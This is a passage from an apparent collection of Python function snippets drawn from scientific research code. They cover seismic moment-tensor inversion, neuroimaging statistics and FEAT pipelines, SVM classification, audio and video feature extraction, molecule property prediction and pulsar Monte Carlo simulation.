M_amplitude_exp_factor = np.random.uniform(low=rel_exp_mag_range[0], high=rel_exp_mag_range[1])\n M_amplitude = 10.**M_amplitude_exp_factor\n # And generate waveform from source mechanism tensor:\n if inversion_type==\"full_mt\":\n MT_curr_sample = generate_random_MT()*M_amplitude # Generate a random MT sample\n elif inversion_type==\"full_mt_Lune_samp\":\n MT_curr_sample = generate_random_MT_Lune_samp()*M_amplitude # Generate a random MT sample, sampled uniformly in Lune space\n elif inversion_type==\"DC\":\n MT_curr_sample = generate_random_DC_MT()*M_amplitude # Generate a random DC sample\n elif inversion_type==\"single_force\":\n MT_curr_sample = generate_random_single_force_vector()*M_amplitude # Generate a random single force sample\n elif inversion_type == \"DC_single_force_couple\":\n MT_curr_sample, random_DC_to_single_force_amp_frac = generate_random_DC_single_force_coupled_tensor() # Generate a random DC-single-force coupled sample, with associated relative amplitude of DC to single force\n MT_curr_sample = MT_curr_sample*M_amplitude\n elif inversion_type == \"DC_single_force_no_coupling\":\n MT_curr_sample, random_DC_to_single_force_amp_frac = generate_random_DC_single_force_uncoupled_tensor()\n MT_curr_sample = MT_curr_sample*M_amplitude\n elif inversion_type == \"DC_crack_couple\":\n MT_curr_sample, random_DC_to_single_force_amp_frac = generate_random_DC_crack_coupled_tensor()\n MT_curr_sample = MT_curr_sample*M_amplitude\n elif inversion_type == \"single_force_crack_no_coupling\":\n MT_curr_sample, random_DC_to_single_force_amp_frac = generate_random_single_force_crack_uncoupled_tensor()\n MT_curr_sample = MT_curr_sample*M_amplitude\n synth_waveform_curr_sample = forward_model(green_func_array, MT_curr_sample) # Note: Greens functions must be of similar amplitude units going into here...\n \n # 5. Compare real data to synthetic waveform (using variance reduction or other comparison metric), to assign probability that data matches current model:\n similarity_curr_sample, shift_idxs = compare_synth_to_real_waveforms(real_data_array, synth_waveform_curr_sample, comparison_metric, perform_normallised_waveform_inversion, compare_all_waveforms_simultaneously, auto_shift_for_best_fit) \n \n # 6. Append results to data store:\n tmp_MTs[:,i] = MT_curr_sample[:,0]\n tmp_similarity_values_all_samples[i] = similarity_curr_sample\n tmp_shift_idxs_all_samples.append(list(shift_idxs))\n if inversion_type == \"DC_single_force_couple\" or inversion_type == \"DC_single_force_no_coupling\" or inversion_type == \"DC_crack_couple\" or inversion_type == \"single_force_crack_no_coupling\":\n tmp_MT_single_force_rel_amps[i] = random_DC_to_single_force_amp_frac\n if invert_for_ratio_of_multiple_media_greens_func_switch:\n if num_phase_types_for_media_ratios>0:\n tmp_medium_1_medium_2_rel_amp_ratios_multi_phases[i,0] = tmp_frac_medium_2_diff_phases_dict[\"P\"]\n tmp_medium_1_medium_2_rel_amp_ratios_multi_phases[i,1] = tmp_frac_medium_2_diff_phases_dict[\"S\"]\n tmp_medium_1_medium_2_rel_amp_ratios_multi_phases[i,2] = tmp_frac_medium_2_diff_phases_dict[\"surface\"]\n else:\n tmp_medium_1_medium_2_rel_amp_ratios[i] = frac_medium_2\n \n if i % 10000 == 0:\n print(\"Processor number:\", procnum, \"- Processed for\",i,\"samples out of\",num_samples_per_processor,\"samples\")\n \n # 7. And convert misfit measure to likelihood function probability:\n tmp_similarity_values_all_samples = np.exp(-(1.-tmp_similarity_values_all_samples)/2.)\n \n # And return values back to script:\n return_dict_MTs[procnum] = tmp_MTs\n return_dict_similarity_values_all_samples[procnum] = tmp_similarity_values_all_samples\n return_dict_shift_idxs[procnum] = tmp_shift_idxs_all_samples\n return_dict_MT_single_force_rel_amps[procnum] = tmp_MT_single_force_rel_amps\n if num_phase_types_for_media_ratios>0:\n return_dict_medium_1_medium_2_rel_amp_ratios[procnum] = tmp_medium_1_medium_2_rel_amp_ratios_multi_phases\n else:\n return_dict_medium_1_medium_2_rel_amp_ratios[procnum] = tmp_medium_1_medium_2_rel_amp_ratios\n print(\"Finished processing process:\", procnum, \"for \", num_samples_per_processor, \"samples.\")",
"def computeSoftwareStatsModels(df,data_label,roi_cols,covar_cols,outcome_col,signific_col,stat_model,mc_correction):\n software_list = df[data_label].unique()\n print('Running {} mass-univariate {} statsmodels on {} {}'.format(len(roi_cols), stat_model, len(software_list),data_label))\n \n # index results on ROI names\n scores_concat_df = pd.DataFrame()\n for pipe in software_list:\n sm_df = df[df[data_label]==pipe]\n print('{} {}'.format(data_label, pipe))\n scores_df = getStatModelPerf2(sm_df,roi_cols,covar_cols,outcome_col,signific_col,stat_model,mc_correction)\n scores_df[data_label] = np.tile(pipe,len(scores_df))\n scores_concat_df = scores_concat_df.append(scores_df)\n print('Top 10 significant regions:\\n {}'.format(scores_df.sort_values(by=['p_val']).head(10)))\n\n return scores_concat_df",
"def runAllGLMS(self):\n\t\tfor condition in ['WMM']:\n\t\t\tfor run in self.conditionDict[condition]:\n\t\t\t\t\n\t\t\t\t# remove previous feat directories\n\t\t\t\ttry:\n\t\t\t\t\tself.logger.debug('rm -rf ' + self.runFile(stage = 'processed/mri', run = self.runList[run], postFix = ['mcf', 'sgtf'], extension = '.feat'))\n\t\t\t\t\tos.system('rm -rf ' + self.runFile(stage = 'processed/mri', run = self.runList[run], postFix = ['mcf', 'sgtf'], extension = '.feat'))\n\t\t\t\t\tos.system('rm -rf ' + self.runFile(stage = 'processed/mri', run = self.runList[run], postFix = ['mcf', 'sgtf'], extension = '.fsf'))\n\t\t\t\texcept OSError:\n\t\t\t\t\tpass\n\t\t\t\t\n\t\t\t\t# this is where we start up fsl feat analysis after creating the feat .fsf file and the like\n\t\t\t\tthisFeatFile = '/home/moorselaar/WMM_PRF/analysis/analysis.fsf'\n\t\t\t\tREDict = {\n\t\t\t\t#'---OUTPUT_DIR---':self.runFile(stage = 'processed/mri', run = r, postFix = ['mcf', 'sgtf']),\n\t\t\t\t'---NR_TRS---':str(NiftiImage(self.runFile(stage = 'processed/mri', run = self.runList[run], postFix = ['mcf', 'sgtf'])).timepoints),\n\t\t\t\t'---FUNC_FILE---':self.runFile(stage = 'processed/mri', run = self.runList[run], postFix = ['mcf', 'sgtf']), \n\t\t\t\t'---CONFOUND_EV---':self.runFile(stage = 'processed/mri', run = self.runList[run], postFix = ['mcf'], extension='.par'), \n\t\t\t\t# '---ANAT_FILE---':os.path.join(os.environ['SUBJECTS_DIR'], self.subject.standardFSID, 'mri', 'bet', 'T1_bet' ), \n\t\t\t\t'---STIM_FILE---':self.runFile(stage = 'processed/behavior', run = self.runList[run], postFix = ['stim_all'], extension='.txt'),\n\t\t\t\t'---RESPONSE_FILE---':self.runFile(stage = 'processed/behavior', run = self.runList[run], postFix = ['resp_all'], extension='.txt'),\n\t\t\t\t'---PPU_FILE---':self.runFile(stage = 'processed/hr', run = self.runList[run], postFix = ['ppu'], extension='.txt'),\n\t\t\t\t'---PPU_R_FILE---':self.runFile(stage = 'processed/hr', run = self.runList[run], postFix = ['ppu','raw'], extension='.txt'),\n\t\t\t\t'---RESP_FILE---':self.runFile(stage = 'processed/hr', run = self.runList[run], postFix = ['resp'], extension='.txt'),\n\t\t\t\t'---RESP_R_FILE---':self.runFile(stage = 'processed/hr', run = self.runList[run], postFix = ['resp','raw'], extension='.txt')\n\t\t\t\t}\n\t\t\t\t\n\t\t\t\tfeatFileName = self.runFile(stage = 'processed/mri', run = self.runList[run], extension = '.fsf')\n\t\t\t\tfeatOp = FEATOperator(inputObject = thisFeatFile)\n\t\t\t\t# no need to wait for execute because we're running the mappers after this sequence - need (more than) 8 processors for this, though.\n\t\t\t\tif self.runList[run] == [self.runList[i] for i in self.conditionDict['WMM']][-1]:\n\t\t\t\t\tfeatOp.configure( REDict = REDict, featFileName = featFileName, waitForExecute = True )\n\t\t\t\telse:\n\t\t\t\t\tfeatOp.configure( REDict = REDict, featFileName = featFileName, waitForExecute = False )\n\t\t\t\tself.logger.debug('Running feat from ' + thisFeatFile + ' as ' + featFileName)\n\t\t\t\t# run feat\n\t\t\t\tfeatOp.execute()",
"def worker(selection_idx, results_table):\n randgen = np.random.RandomState()\n \n # Data-specific positive set partition (the real-world dataset consists of multiple motif classes, always exactly 3 instances of each class stored consequently).\n # The partition assures that the training and test sets do not share instances of the same motif class\n positive_n_train = round(0.8 * len(positive_set_) / 3) * 3\n block_start_idx = randgen.randint(positive_n_train / 3 + 1) * 3 \n block_end_idx = block_start_idx + len(positive_set_) - positive_n_train\n positive_set_part_train, positive_set_part_test = (np.concatenate((positive_set_[: block_start_idx], positive_set_[block_end_idx: ])), positive_set_[block_start_idx: block_end_idx])\n \n # Negative set partition with random selection of elements to match the size of the positive set\n negative_set = negative_set_[randgen.choice(len(negative_set_), size = positive_set_.shape[0], replace = False)]\n negative_n = len(negative_set)\n negative_n_train = round(negative_n * 0.8)\n negative_set_part_train, negative_set_part_test = (negative_set[: negative_n_train], negative_set[negative_n_train: ])\n \n data_part_train = np.float64(np.concatenate((positive_set_part_train, negative_set_part_train)))\n labels_part_train = np.concatenate((np.ones(len(positive_set_part_train), dtype = 'i1'), np.zeros(len(negative_set_part_train), dtype = 'i1')))\n data_part_test = np.float64(np.concatenate((positive_set_part_test, negative_set_part_test)))\n labels_part_test = np.concatenate((np.ones(len(positive_set_part_test), dtype = 'i1'), np.zeros(len(negative_set_part_test), dtype = 'i1')))\n \n # Specifying the pipeline and the CV structure\n pruner = feature_selection.VarianceThreshold()\n scaler = preprocessing.StandardScaler()\n feature_selector = feature_selection.SelectKBest(feature_selection.f_classif)\n classifier = svm.SVC(kernel = 'rbf', gamma = 0.01, class_weight = 'balanced')\n pipeline0 = pipeline.Pipeline([\n ('pruning', pruner),\n ('scaling', scaler),\n ('selection', feature_selector),\n ('classification', classifier)\n ])\n cv_structure = model_selection.StratifiedShuffleSplit(n_splits = 10, test_size = 0.2)\n scoring = 'recall_macro' #same as balanced accuracy\n grid = model_selection.GridSearchCV(pipeline0, scoring = scoring, param_grid = param_grid, cv = cv_structure, n_jobs = 1)\n \n # Training the pipeline, saving the data\n grid.fit(data_part_train, labels_part_train)\n results_table[selection_idx][0] = np.log10(grid.best_params_['classification__C'])\n results_table[selection_idx][1] = grid.best_params_['selection__k']\n results_table[selection_idx][2] = grid.best_score_\n \n # Testing the pipeline, saving the data\n results_table[selection_idx][3] = grid.score(data_part_test, labels_part_test)",
"def computeSoftwareMLModels(df,data_label,roi_cols,covar_continuous_cols,covar_cat_cols,outcome_col,group_col,model_type,ml_model,rank_features=False,compute_null=False,n_splits=10,n_repeats=10,n_jobs=1):\n software_list = df[data_label].unique()\n print('Running ML classifer on {} {}'.format(len(software_list),data_label))\n scores_concat_df = pd.DataFrame()\n feature_rank_concat_df = pd.DataFrame()\n external_scores_concat_df = pd.DataFrame()\n\n perf_pval_dict = {}\n for pipe in software_list:\n ml_df = df[df[data_label]==pipe]\n print('{} {}'.format(data_label, pipe))\n\n #cross_val_score\n scores_df, null_df, pvalue, feature_rank_df = getMLModelPerf(ml_df,roi_cols,covar_continuous_cols,covar_cat_cols,outcome_col,model_type,ml_model,rank_features,compute_null,n_splits,n_repeats,n_jobs) \n scores_df[data_label] = np.tile(pipe,len(scores_df))\n scores_concat_df = scores_concat_df.append(scores_df)\n \n if compute_null:\n null_df[data_label] = np.tile('null',len(null_df))\n scores_concat_df = scores_concat_df.append(null_df)\n perf_pval_dict[pipe] = pvalue\n\n # RFECV\n if rank_features:\n feature_rank_df[data_label] = np.tile(pipe,len(feature_rank_df))\n feature_rank_concat_df = feature_rank_concat_df.append(feature_rank_df)\n\n # explicit CV for internal vs external perfomance\n if group_col:\n external_scores_df = getIndependentTestSetPerf(ml_df,roi_cols,covar_continuous_cols,covar_cat_cols,outcome_col,group_col,model_type,ml_model)\n external_scores_df[data_label] = np.tile(pipe,len(external_scores_df))\n external_scores_concat_df = external_scores_concat_df.append(external_scores_df) \n\n return scores_concat_df, perf_pval_dict, feature_rank_concat_df, external_scores_concat_df",
"def run_pipeline(directory):\n\n # io = IO(path)\n # df = io.load_cleaned_file(download_always=False)\n # df = add_choke_events(df)\n\n # Add calls to features.Xxx here\n\n #directory = main_directory\n site=os.listdir(directory)\n site_dicom={}\n site_dicom_sub={}\n site_sub_files={}\n i,k,j=0,0,0\n for filename in site:\n site_dicom[i]=directory+'/'+filename+'/DICOM-raw'\n temporary_path=os.listdir(site_dicom[i])\n\n for another_file in temporary_path:\n site_dicom_sub[j]=site_dicom[i]+'/'+another_file+'/scans'\n temporary_path_1 = os.listdir(site_dicom_sub[j])\n for another_file_1 in temporary_path_1:\n site_sub_files[k]=site_dicom_sub[j]+'/'+another_file_1+'/'\n k=k+1\n j = j + 1\n i=i+1\n splitted={}\n output_mif={}\n for i in range (len(site_sub_files)):\n splitted[i]=site_sub_files[i].split('/')\n output_mif[i]=directory+'/'+splitted[i][5]+'/MIF-raw/'+splitted[i][5]+'_'+splitted[i][7]+'_'+splitted[i][9]+'.mif'\n\n\n # save (or return) dataframe here?\n return site_sub_files,output_mif",
"def extract_features(audio_filename, args):\n #print(\"Extract_features\")\n spec_type = args['spec_type']\n\n if spec_type == 'cqt':\n bin_multiple = args['bin_multiple']\n max_midi = args['max_midi']\n min_midi = args['min_midi']\n note_range = max_midi - min_midi + 1\n sr = args['sr']\n hop_length = args['hop_length']\n window_size = args['window_size']\n\n bins_per_octave = 12 * bin_multiple # should be a multiple of 12\n n_bins = note_range * bin_multiple\n\n # down-sample,mono-channel\n y, _ = librosa.load(audio_filename, sr)\n # y: an np.ndarray[ shape=(n,) ] giving the audio time series. librosa.load automatically downsamples to the\n # required sample rate sr\n # doku on librosa.cqt:\n # https://librosa.github.io/librosa/generated/librosa.core.cqt.html?highlight=cqt#librosa.core.cqts\n S = librosa.cqt(y, fmin=librosa.midi_to_hz(min_midi), sr=sr, hop_length=hop_length,\n bins_per_octave=bins_per_octave, n_bins=n_bins)\n S = S.T\n S = np.abs(S)\n min_db = np.min(S)\n print(np.min(S), np.max(S), np.mean(S))\n S = np.pad(S, ((window_size // 2, window_size // 2), (0, 0)), 'constant', constant_values=min_db)\n\n windows = []\n\n # IMPORTANT NOTE:\n # Since we pad the the spectrogram frame,\n # the onset frames are actually `offset` frames.\n # To obtain a window of the center frame at each true index, we take a slice from i to i+window_size\n # starting at frame 0 of the padded spectrogram\n for i in range(S.shape[0] - window_size + 1):\n w = S[i:i + window_size, :]\n windows.append(w)\n\n # print inputs\n x = np.array(windows)\n return x\n\n else:\n print(\"WARNING: feature type \" + spec_type + \" not implemented.\")\n return 0",
"def main():\n parser = argparse.ArgumentParser(description=\"Process the results of an experiment.\")\n parser.add_argument(\"experiment\")\n arguments = parser.parse_args()\n path = f\"experiments/{arguments.experiment}\"\n if not os.path.exists(path):\n raise SystemExit(f\"Path {path} does not exists.\")\n\n # For efficiency, one should generate the results from the parts without merging them.\n files = [file for file in os.listdir(path) if os.path.isfile(os.path.join(path, file))]\n frames = []\n for file in files:\n device, experiment, _ = file.split(\".\")\n frame = pandas.read_csv(\n os.path.join(path, file),\n index_col=\"variable\",\n usecols=[\"variable\", \"group_index\", \"value_i\"], dtype={\"value_i\": \"Int64\"}\n )\n frame[\"board\"] = device\n frame[\"experiment\"] = experiment\n frames.append(frame)\n dataframe = pandas.concat(frames)\n frames = None\n\n current_grouping = dataframe.groupby([\"group_index\", \"variable\"])\n \n data = current_grouping.agg([\n numpy.median,\n _percentile_factory(95),\n numpy.mean,\n numpy.std,\n \"count\"\n ])\n\n print(data)\n \n data = data.droplevel([0], axis=1)\n data = data.unstack()\n data.columns = data.columns.map('_'.join)\n data.to_csv(f\"{arguments.experiment}.csv\")",
"def featMatGenerator(dirName, trajfile, trajFilter):\n \n #load the data and extract feature vectors for each trajectory and plate summary for each chunk\n featMatTraj = {}\n featMatPlate = pd.DataFrame()\n try:\n if len(trajfile.split('_'))<10:\n fshort = '_'.join(trajfile.split('_')[0:-2:6])\n else:\n fshort = '_'.join(trajfile.split('_')[0:-1:7])\n featMatPlate = pd.DataFrame()\n with pd.HDFStore(os.path.join(dirName, trajfile), 'r') as fid:\n nChunks = list(fid.keys())\n for chunk in nChunks:\n chunkno = [int(s) for s in chunk.split('_') if s.isdigit()]\n chunkno = chunkno[0]\n\n featMatTraj[chunkno] = pd.DataFrame()\n nWorms = np.unique(fid[chunk]['worm_index'])\n for w in nWorms:\n if fid[chunk][fid[chunk]['worm_index']==w].shape[0]>=trajFilter:\n featMatTraj[chunkno] = featMatTraj[chunkno].append(\\\n fid[chunk][fid[chunk]['worm_index']==w].mean(),ignore_index=True)\n \n featMatTraj[chunkno].reset_index(drop=True)\n \n temp = featMatTraj[chunkno].median()\n temp = temp.drop(['worm_index', 'timestamp']).rename(lambda x: x +'_med').to_frame().transpose()\n \n temp2 = featMatTraj[chunkno].quantile(0.75) - featMatTraj[chunkno].quantile(0.25)\n temp2 = temp2.drop(['worm_index', 'timestamp']).rename(lambda x: x + '_iqr').to_frame().transpose()\n \n tempfinal = pd.concat([temp, temp2], axis = 1)\n tempfinal ['exp'] = fshort\n tempfinal['Chunk'] = chunk\n tempfinal ['drug'] = fshort.split('_')[0]\n \n featMatPlate = featMatPlate.append(tempfinal, ignore_index=True)\n del temp, temp2, tempfinal\n del nWorms\n del nChunks\n \n featMatPlate.reset_index(drop=True) \n featMatPlate.drop(featMatPlate.columns[np.sum(featMatPlate.isna()>featMatPlate.shape[0]/2)], \\\n axis=1, inplace = True)\n except OSError:\n print (trajfile + 'is invalid file format') \n\n #write the featMatPlate to a .csv file\n featMatPlate.to_csv(os.path.join(os.path.dirname(dirName), fshort + '_FeatMatPlate.csv'))\n\n #save the featMatTraj to an excel file\n writer = pd.ExcelWriter(os.path.join(os.path.dirname(dirName), fshort + '_FatMatTraj.xlsx'))\n for chunk in featMatTraj.keys():\n featMatTraj[chunk].to_excel(writer, sheet_name = str(chunk))\n writer.save()\n \n return featMatTraj, featMatPlate",
"def compute_all_features(mp3_file):\n # Decode and read mp3\n audio, _ = librosa.load(mp3_file, sr=SR)\n\n # Compute mels\n mel = compute_melspecs(audio)\n\n # Save\n out_file = os.path.join(\n OUTPUT_DIR, os.path.basename(mp3_file).replace(\".mp3\", \"-mel.npy\"))\n np.save(out_file, mel)",
"def preprocess_data(self):\n # Fault and cavity models use same data and features. Get that now.\n signals = get_signal_names(cavities=['1', '2', '3', '4', '5', '6', '7', '8'],\n waveforms=['GMES', 'GASK', 'CRFP', 'DETA2'])\n\n # We need to crop, downsample, then do z-score. Any constant values are set to 0.001 manually.\n num_resample = 4096\n num_meta_columns = 8\n self.common_features_df = window_extractor(self.example, signals=signals, windows={'pre-fault': -1533.4},\n n_samples=7680, standardize=False, downsample=True,\n ds_kwargs={'num': num_resample})\n\n # The extractor makes a row per requested window plus some metadata. Columns are named\n # Sample_<sample_num>_<cav_num>_<signal>, and go Sample_1_1_GMES, Sample_2_1_GMES, ..., Sample_1_1_GASK, ....\n # We want to change this so that each column is all of the samples for 1_GMES, 1_GASK, ... as in the signal\n # order above.\n self.common_features_df = pd.DataFrame(\n self.common_features_df.iloc[0, num_meta_columns:].values.reshape(len(signals), -1).T, columns=signals)\n\n self.common_features_df = standard_scaling(self.common_features_df, fill=0.001)",
"def save_predict_results():\n\n ori_lst = []\n for i in range(1, 4):\n ori_df = pd.read_csv('Training_Model'+str(i)+'.csv')\n ori_list = ori_df['SMILES'].tolist()\n ori_lst.append(ori_list)\n frames = []\n gen_mols = []\n gen_fps = []\n for i, group in enumerate(['all', 'class3', 'prom']):\n gen_df = pd.read_csv('novel_sampled_cano_script_'+group+'_until.csv')\n gen_list = gen_df['SMILES'].tolist()\n print('Number of molecules in training for model {} is {}'.format(i+1, len(ori_lst[i])))\n over, num, smi_list = get_smi_list_overlap(ori_lst[i], gen_list)\n smi_mols = get_mols(smi_list)\n smi_fps, failed_mols = get_fingerprints(smi_mols)\n for idx in sorted(failed_mols, reverse=True):\n del smi_list[idx]\n smi_df = pd.Series(data=smi_list, name='SMILES').to_frame()\n smi_df.loc[:,'Group'] = i+1\n frames.append(smi_df)\n\n unique_df = pd.concat(frames)\n gen_smi = unique_df['SMILES'].tolist()\n gen_mols = get_mols(gen_smi)\n gen_fps, _ = get_fingerprints(gen_mols)\n unique_df['Gaps'] = predict_property('gbdt_regessor_gap_regu.joblib', gen_fps)\n unique_df['Dips'] = predict_property('gbdt_regessor_dip_reg.joblib', gen_fps)\n promising_df = unique_df.loc[(unique_df['Gaps'] <= 2.0) & (unique_df['Dips']<=3.66)]\n unique_df.to_csv('Unique_models_15epoch.csv', index=False)\n promising_df.to_csv('Promising_models_15epoch.csv', index=False)",
"def run_regression_experiments(self):\n assert self.patientIDs # assert not empty\n self.log.info(\"Running experiments for {} patients\".format(len(self.patientIDs)))\n\n results_batch = defaultdict(dict)\n results_single = dict()\n for patient in self.patientIDs:\n patient_experiment = PatientPredictionExperiment(\n patient_id=patient, algorithm=self.algorithm,\n is_batch=self.isBatch\n )\n # run results for single patients\n if not self.isBatch:\n results_single[patient] = patient_experiment.run_experiment()\n self.log.debug(\"Start processing single results: {}\".format(results_single[patient]))\n # super verbose debug information should be logged with debug option\n else:\n # TODO: think about consistent interfaces\n batch_results, self._allFeatureDesp = patient_experiment.run_experiment()\n self.log.info(\"Start processing batch results with {} batches\".format(len(batch_results)))\n batchNo = 0\n for results in batch_results:\n # here are the result for each feature subset for each patients\n results_batch[batchNo][patient] = results\n batchNo += 1\n if self.algorithm == \"fm\":\n return\n if not self.isBatch:\n results_overall = self.process_results(results_single)\n self.store_results(results_overall, results_single)\n self.log.info(\"Finished running experiment\")\n else:\n self.record_batch_experiment()\n for batchNo, patient_results in results_batch.iteritems():\n # patient_results = results_single\n results_overall = self.process_results(patient_results)\n self.store_results(results_overall, patient_results, self._allFeatureDesp[batchNo])\n self.log.info(\"Finished running experiment No. {}\".format(batchNo))",
"def RUN_PULSAR(numTrials, rateMap, numPhotons=48,numPulsars = 6, angularSize=10.0, outputSize=100, mcList='MCOut.pickle',flatLevel = 0.0,HESS=False, Sig = -1,numProcs = 10):\r\n import FermiPSF, ParseFermi\r\n \r\n print 'Beginning MC Series\\nProgress'\r\n\r\n mcOut = []\r\n map = pickle.load(open(rateMap, \"r\" )) # load rate-map\r\n PSFTableFront = FermiPSF.PSF_130(convType='front') # load PSF front converting\r\n PSFTableBack = FermiPSF.PSF_130(convType='back') # load PSF back converting\r\n start = time.time();\r\n \r\n ppa = outputSize/angularSize # pixel per degree\r\n\r\n # Import background template\r\n bgmap = 'BGRateMap.pickle'\r\n if (HESS == True):\r\n bgmap = 'BGRateMap_HESS_2_deg.pickle'\r\n \r\n bgTemplate = pickle.load(open(bgmap , \"r\" ))\r\n \r\n mcOut = np.zeros(numTrials)\r\n p = pool.Pool(numProcs)\r\n partial_MC_PULSAR_THREAD = partial( MC_PULSAR_THREAD, map = map,bgTemplate=bgTemplate,PSFTableFront=PSFTableFront, PSFTableBack=PSFTableBack, HESS=HESS, angularSize=angularSize, numPhotons=numPhotons, outputSize=outputSize, numPulsars = numPulsars,Sig=Sig)\r\n mcOut = p.map(partial_MC_PULSAR_THREAD, mcOut)\r\n \r\n# for i in range(numTrials):\r\n# np.random.seed()\r\n# # Compute number of background photons\r\n# numSignal = np.random.poisson(lam = .25*numPhotons)\r\n# if (HESS == True):\r\n# numSignal = np.random.poisson(lam = .05*numPhotons)\r\n# if Sig >= 0:\r\n# numSignal = np.random.poisson(lam = Sig*numPhotons)\r\n# \r\n# bg = numPhotons-numSignal # number of BG photons\r\n# \r\n# # Build the background \r\n## background = Build_Background_Sideband(bgMean, lowSideband, highSideband, PSFTable)\r\n# background = Build_Background_Template(bg, bgTemplate, PSFTableFront, PSFTableBack ,HESS=HESS, angularSize = angularSize )\r\n# \r\n# \r\n# # Run MC for source photons \r\n# data = MC_PULSAR(map,numSignal, numPulsars,angularSize,outputSize,PSFTableFront, PSFTableBack, HESS = HESS)\r\n# # Concatenate and append this run to the simulation output\r\n# mcOut.append((data[0]+background[0], data[1]+background[1]))\r\n# \r\n# # Compute Speed Statistics\r\n# sys.stdout.write('\\r' + str(i+1)+'/'+str(numTrials)) \r\n# sys.stdout.flush()\r\n elapsed = time.time()-start;\r\n if (elapsed != 0.0):\r\n print '\\nSimulations Completed in', elapsed, 's', '(',numTrials/elapsed, ' sims per second)'\r\n \r\n outFile = open(mcList, \"wb\" )\r\n pickle.dump(mcOut, outFile)\r\n print 'Results saved to ', mcList\r\n return mcOut",
"def run(self):\n\n for file_cnt, file_path in enumerate(self.files_found):\n video_timer = SimbaTimer()\n video_timer.start_timer()\n _, self.video_name, _ = get_fn_ext(file_path)\n self.video_info, self.px_per_mm, self.fps = self.read_video_info(\n video_name=self.video_name\n )\n self.width, self.height = int(\n self.video_info[\"Resolution_width\"].values[0]\n ), int(self.video_info[\"Resolution_height\"].values[0])\n if self.video_setting:\n self.fourcc = cv2.VideoWriter_fourcc(*Formats.MP4_CODEC.value)\n self.video_save_path = os.path.join(\n self.heatmap_clf_location_dir, self.video_name + \".mp4\"\n )\n self.writer = cv2.VideoWriter(\n self.video_save_path,\n self.fourcc,\n self.fps,\n (self.width, self.height),\n )\n if self.frame_setting:\n self.save_video_folder = os.path.join(\n self.heatmap_clf_location_dir, self.video_name\n )\n if not os.path.exists(self.save_video_folder):\n os.makedirs(self.save_video_folder)\n self.data_df = read_df(file_path=file_path, file_type=self.file_type)\n clf_array, aspect_ratio = self.__calculate_bin_attr(\n data_df=self.data_df,\n clf_name=self.clf_name,\n bp_lst=self.bp_lst,\n px_per_mm=self.px_per_mm,\n img_width=self.width,\n img_height=self.height,\n bin_size=self.bin_size,\n fps=self.fps,\n )\n\n if self.max_scale == \"auto\":\n self.max_scale = self.__calculate_max_scale(clf_array=clf_array)\n if self.max_scale == 0:\n self.max_scale = 1\n\n if self.final_img_setting:\n self.make_clf_heatmap_plot(\n frm_data=clf_array[-1, :, :],\n max_scale=self.max_scale,\n palette=self.palette,\n aspect_ratio=aspect_ratio,\n file_name=os.path.join(\n self.heatmap_clf_location_dir,\n self.video_name + \"_final_frm.png\",\n ),\n shading=self.shading,\n clf_name=self.clf_name,\n img_size=(self.width, self.height),\n final_img=True,\n )\n\n if self.video_setting or self.frame_setting:\n for frm_cnt, cumulative_frm_idx in enumerate(range(clf_array.shape[0])):\n frm_data = clf_array[cumulative_frm_idx, :, :]\n cum_df = pd.DataFrame(frm_data).reset_index()\n cum_df = cum_df.melt(\n id_vars=\"index\",\n value_vars=None,\n var_name=None,\n value_name=\"seconds\",\n col_level=None,\n ).rename(\n columns={\"index\": \"vertical_idx\", \"variable\": \"horizontal_idx\"}\n )\n cum_df[\"color\"] = (\n (cum_df[\"seconds\"].astype(float) / float(self.max_scale))\n .round(2)\n .clip(upper=100)\n )\n color_array = np.zeros(\n (\n len(cum_df[\"vertical_idx\"].unique()),\n len(cum_df[\"horizontal_idx\"].unique()),\n )\n )\n for i in range(color_array.shape[0]):\n for j in range(color_array.shape[1]):\n value = cum_df[\"color\"][\n (cum_df[\"horizontal_idx\"] == j)\n & (cum_df[\"vertical_idx\"] == i)\n ].values[0]\n color_array[i, j] = value\n\n fig = plt.figure()\n im_ratio = color_array.shape[0] / color_array.shape[1]\n plt.pcolormesh(\n color_array,\n shading=self.shading,\n cmap=self.palette,\n rasterized=True,\n alpha=1,\n vmin=0.0,\n vmax=float(self.max_scale),\n )\n plt.gca().invert_yaxis()\n plt.xticks([])\n plt.yticks([])\n plt.axis(\"off\")\n plt.tick_params(axis=\"both\", which=\"both\", length=0)\n cb = plt.colorbar(pad=0.0, fraction=0.023 * im_ratio)\n cb.ax.tick_params(size=0)\n cb.outline.set_visible(False)\n cb.set_label(\n \"{} (seconds)\".format(self.clf_name), rotation=270, labelpad=10\n )\n plt.tight_layout()\n plt.gca().set_aspect(aspect_ratio)\n canvas = FigureCanvas(fig)\n canvas.draw()\n mat = np.array(canvas.renderer._renderer)\n image = cv2.cvtColor(mat, cv2.COLOR_RGB2BGR)\n image = cv2.resize(image, (self.width, self.height))\n image = np.uint8(image)\n plt.close()\n\n if self.video_setting:\n self.writer.write(image)\n if self.frame_setting:\n frame_save_path = os.path.join(\n self.save_video_folder, str(frm_cnt) + \".png\"\n )\n cv2.imwrite(frame_save_path, image)\n print(\n \"Created heatmap frame: {} / {}. Video: {} ({}/{})\".format(\n str(frm_cnt + 1),\n str(len(self.data_df)),\n self.video_name,\n str(file_cnt + 1),\n len(self.files_found),\n )\n )\n\n if self.video_setting:\n self.writer.release()\n\n video_timer.stop_timer()\n print(\n \"Heatmap plot for video {} saved (elapsed time: {}s) ... \".format(\n self.video_name, video_timer.elapsed_time_str\n )\n )\n\n self.timer.stop_timer()\n stdout_success(\n msg=\"All heatmap visualizations created in project_folder/frames/output/heatmaps_classifier_locations directory\",\n elapsed_time=\"self.timer.elapsed_time_str\",\n )",
"def get_video_data(self):\n\t\tfeature_str = 'fdhh' if self.fdhh else 'pca'\n\t\tif self.options.mode == 'test':\n\t\t\tfeature_path = (f'{self.feature_folder}_FD', f'train_test_{feature_str}.pic')\n\t\telse:\n\t\t\tfeature_path = (f'{self.feature_folder}_FD', f'train_dev_{feature_str}.pic')\n\t\t\t\n\t\t# Return saved features if exist:\n\t\tif not self.options.save_features and os.path.exists(f'{feature_path[0]}/{feature_path[1]}'):\n\t\t\tX_train, X_test = load_from_file(f'{feature_path[0]}/{feature_path[1]}')\n\t\telse:\n\t\t\tX_train, X_test = self.get_train_test()\n\t\t\t'''X_train, X_test = scale(X_train, X_test, scale_type='standard', axis=0, use_boxcox=True, boxcox_axis=0,\n\t\t\t use_pandas=True, verbose=self.options.verbose)'''\n\t\t\tX_train, X_test = scale(X_train, X_test, scale_type='minmax', axis=0, use_pandas=True,\n\t\t\t verbose=self.options.verbose)\n\t\t\tif self.fdhh:\n\t\t\t\tif self.options.verbose:\n\t\t\t\t\tprint('Performing FDHH over train and test 